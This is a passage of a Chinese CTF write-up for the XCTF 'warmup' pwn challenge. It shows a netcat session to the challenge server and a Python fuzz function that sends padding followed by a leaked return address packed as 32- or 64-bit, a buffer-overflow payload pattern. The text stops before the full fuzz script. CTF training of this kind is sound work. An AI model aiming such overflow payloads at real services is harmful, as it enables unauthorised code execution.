warmup [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列14

本文介绍了CTF高手进阶区的warmup题目,重点在于fuzzing技术的应用。通过分析题目提示和程序行为,文章详细展示了如何进行fuzz测试,包括不带地址、32位地址和64位地址的fuzzing方法,并最终成功获取flag,揭示了对未知程序进行简单fuzz过程的关键步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

题目地址:warmup

这是高手进阶区的第三题,我们先看下题目内容

这个题目没有附件,那就是要fuzz的题目了,我们先正常走一下程序看看

root@mypwn:/ctf/work/python/warmup# nc 111.198.29.45 32453
-Warm Up-
WOW:0x40060d
>AAA

这个题目的出发点就是要大家做fuzz,看下提示内容有个地址0x40060d,那就是说fuzz的时候要带上地址/或者不带地址。

先给出fuzz的函数

addr = 0x40060d
def send_fuzz(p, num, type):
	payload = 'A'*num
	if type == 1:
		payload += p32(addr)
	if type == 2:
		payload += p64(addr)
	p.sendlineafter('>', payload)

这里分成3种类型:不带地址,带32位地址,带64位地址

根据fuzz函数,构造fuzz带python脚本:

评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值